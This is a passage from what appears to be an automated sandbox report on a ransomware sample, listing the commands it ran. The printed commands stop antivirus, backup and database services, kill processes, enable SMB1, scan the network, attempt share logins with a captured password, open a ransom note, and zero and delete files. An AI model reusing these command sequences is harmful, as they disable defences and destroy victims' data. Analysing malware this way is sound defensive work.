- Suspicious use of AdjustPrivilegeToken
PID:9332
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9324
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9316
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9304
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9296
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9288
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9280
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9268
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9256
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9244
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4560
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9176
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵PID:8708
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y2⤵PID:6344
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mozyprobackup /y2⤵PID:7944
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ekrn /y2⤵PID:7936
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵PID:7928
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c net view2⤵PID:7364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:7356 -
C:\Users\Admin\AppData\Local\Temp\51E4174A-D5A1-469B-B7F6-EA3C510AC081\dismhost.exeC:\Users\Admin\AppData\Local\Temp\51E4174A-D5A1-469B-B7F6-EA3C510AC081\dismhost.exe {B5037D0E-EEFA-45E5-B56F-F023668A5C0D}3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:15884
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop vapiendpoint /y2⤵PID:7336
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵PID:7328
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop WRSVC /y2⤵PID:7320
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵PID:7308
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵PID:7300
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLTELEMETRY /y2⤵PID:7292
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKeyScheduler /y2⤵PID:7284
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵PID:7276
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TrueKey /y2⤵PID:7268
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLSafeOLRService /y2⤵PID:7256
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop tmlisten /y2⤵PID:7248
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLBrowser /y2⤵PID:7232
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop TmCCSF /y2⤵PID:7224
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵PID:7208
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_update_64 /y2⤵PID:7200
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:7184
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_update /y2⤵PID:7176
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵PID:3932
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_service /y2⤵PID:4776
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$TPS /y2⤵PID:7156
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop swi_filter /y2⤵PID:7148
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵PID:7140
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop svcGenericHost /y2⤵PID:7132
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵PID:7124
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵PID:7116
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵PID:7108
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophossps /y2⤵PID:7096
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵PID:7088
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SntpService /y2⤵PID:7072
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵PID:7064
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SmcService /y2⤵PID:7048
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵PID:7040
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Smcinst /y2⤵PID:7032
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PROD /y2⤵PID:7024
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ShMonitor /y2⤵PID:7012
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵PID:7004
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SepMasterService /y2⤵PID:6996
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵PID:6988
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SAVService /y2⤵PID:6980
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$ECWDB2 /y2⤵PID:6972
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SAVAdminService /y2⤵PID:6960
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$CXDB /y2⤵PID:6952
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sacsvr /y2⤵PID:6936
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵PID:6928
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SOPHOS /y2⤵PID:6912
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y2⤵PID:6904
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sms_site_sql_backup /y2⤵PID:6896
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfevtp /y2⤵PID:6880
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RESvc /y2⤵PID:6872
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop wbengine /y2⤵PID:6864
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfemms /y2⤵PID:6856
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵PID:6848
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop wbengine /y2⤵PID:6840
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfefire /y2⤵PID:6824
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop OracleClientCache80 /y2⤵PID:6816
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:6800
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McTaskManager /y2⤵PID:6792
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MySQL80 /y2⤵PID:6776
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamRESTSvc /y2⤵PID:6768
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McShield /y2⤵PID:6752
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MySQL57 /y2⤵PID:6744
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:6728
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵PID:6720
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerOLAPService /y2⤵PID:6704
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamMountSvc /y2⤵PID:6696
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeFramework /y2⤵PID:6676
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵PID:6668
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamHvIntegrationSvc /y2⤵PID:6652
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeEngineService /y2⤵PID:6644
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerADHelper /y2⤵PID:6636
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y2⤵PID:6628
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MBEndpointAgent /y2⤵PID:6620
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLSERVER /y2⤵PID:6604
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploySvc /y2⤵PID:6596
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MBAMService /y2⤵PID:6580
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵PID:6572
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:6556
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop masvc /y2⤵PID:6548
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y2⤵PID:6532
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamCloudSvc /y2⤵PID:6524
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop macmnsvc /y2⤵PID:6508
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵PID:6500
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamCatalogSvc /y2⤵PID:6484
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop klnagent /y2⤵PID:6476
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵PID:6460
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamBrokerSvc /y2⤵PID:6452
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop kavfsslp /y2⤵PID:6436
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵PID:6428
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop KAVFSGT /y2⤵PID:6404
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵PID:6396
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLWriter /y2⤵PID:6380
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop KAVFS /y2⤵PID:6372
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵PID:6356
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:6348
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop FA_Scheduler /y2⤵PID:6332
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵PID:6324
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SDRSVC /y2⤵PID:6304
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ESHASRV /y2⤵PID:6296
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:6288
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵PID:6280
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EsgShKernel /y2⤵PID:6264
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵PID:6256
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ntrtscan /y2⤵PID:6240
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EPUpdateService /y2⤵PID:6232
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$TPS /y2⤵PID:6216
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:6208
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EPSecurityService /y2⤵PID:6192
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DCAgent /y2⤵PID:6184
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵PID:6168
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:6160
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AVP /y2⤵PID:4132
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵PID:4988
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵PID:4016
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:2480
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Antivirus /y2⤵PID:2072
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵PID:5220
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:200
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:3832
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PROD /y2⤵PID:5032
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:2084
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵PID:2424
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵PID:2284
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵PID:4568
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵PID:5060
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵PID:4672
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:6136
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵PID:6120
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop audioendpointbuilder /y2⤵PID:6112
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵PID:6104
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:6088
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Message Router” /y2⤵PID:6080
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵PID:6064
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵PID:6056
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ARSM /y2⤵PID:6040
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵PID:6032
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msexchangeimap4 /y2⤵PID:6016
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵PID:6008
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵PID:5992
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:5984
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵PID:5968
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msexchangeadtopology /y2⤵PID:5960
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵PID:5944
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$TPS /y2⤵PID:5936
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵PID:5924
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵PID:5912
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Health Service” /y2⤵PID:5904
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeSRS /y2⤵PID:5888
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop W3Svc /y2⤵PID:5880
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵PID:5864
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵PID:5856
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$TPS /y2⤵PID:5848
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵PID:5832
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeSA /y2⤵PID:5824
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop UI0Detect /y2⤵PID:5808
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵PID:5800
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵PID:5788
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵PID:5776
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵PID:5768
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeMTA /y2⤵PID:5760
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SstpSvc /y2⤵PID:5752
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msftesql$PROD /y2⤵PID:5744
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵PID:5736
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵PID:5724
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SMTPSvc /y2⤵PID:5716
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵PID:5708
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeMGMT /y2⤵PID:5700
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop POP3Svc /y2⤵PID:5692
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer110 /y2⤵PID:5684
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵PID:5668
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer /y2⤵PID:5660
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SamSs /y2⤵PID:5652
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵PID:5644
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetMsmqActivator /y2⤵PID:5624
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer100 /y2⤵PID:5616
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQL Backups /y2⤵PID:5608
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵PID:5596
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EraserSvc11710 /y2⤵PID:5588
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Agent” /y2⤵PID:5580
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeES /y2⤵PID:5572
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop IISAdmin /y2⤵PID:5564
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer /y2⤵PID:5556
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵PID:5544
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y2⤵PID:5532
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:5524
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:5516
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:5508
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:5500
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:5492
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:5484
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:5476
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:5468
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:5460
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:5448
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:5440
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵PID:5432
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y2⤵PID:5424
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:5416
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:5408
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:5400
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:5392
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:5380
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:15668
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\Users /USER:d.rustamov 644468462⤵PID:15680
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use \\10.10.0.28\Users /USER:2⤵PID:14648
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use "\\RJMQBVDN\" /USER:2⤵PID:13464
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp669.bat2⤵PID:13320
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" use "\\RJMQBVDN\" /USER:d.rustamov 644468462⤵PID:4492
-
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt2⤵
- Opens file in notepad (likely ransom note)
PID:15128
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:4736
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:13820
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:13960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\SyncApteka.bin.exe2⤵PID:4700
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:13496
-
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start Dnscache /y1⤵PID:4888
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start SSDPSRV /y1⤵PID:4864
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost1⤵PID:4192
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub1⤵PID:4784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y1⤵PID:768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y1⤵PID:5292
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:4556
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵PID:13252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y1⤵PID:14028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ekrn /y1⤵PID:14776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵PID:14768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y1⤵PID:14760
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y1⤵PID:14752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y1⤵PID:14680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y1⤵PID:14668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y1⤵PID:14660
-
C:\Windows\system32\net.exenet view1⤵
- Discovers systems in the same network
PID:16840
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y1⤵PID:14644
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y1⤵PID:14636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y1⤵PID:14628
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y1⤵PID:14620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵PID:14612
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y1⤵PID:14604
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y1⤵PID:14596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y1⤵PID:14588
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y1⤵PID:14580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y1⤵PID:14572
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y1⤵PID:14564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y1⤵PID:14556
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y1⤵PID:14548
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y1⤵PID:14540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y1⤵PID:14532
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y1⤵PID:14524
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y1⤵PID:14516
-
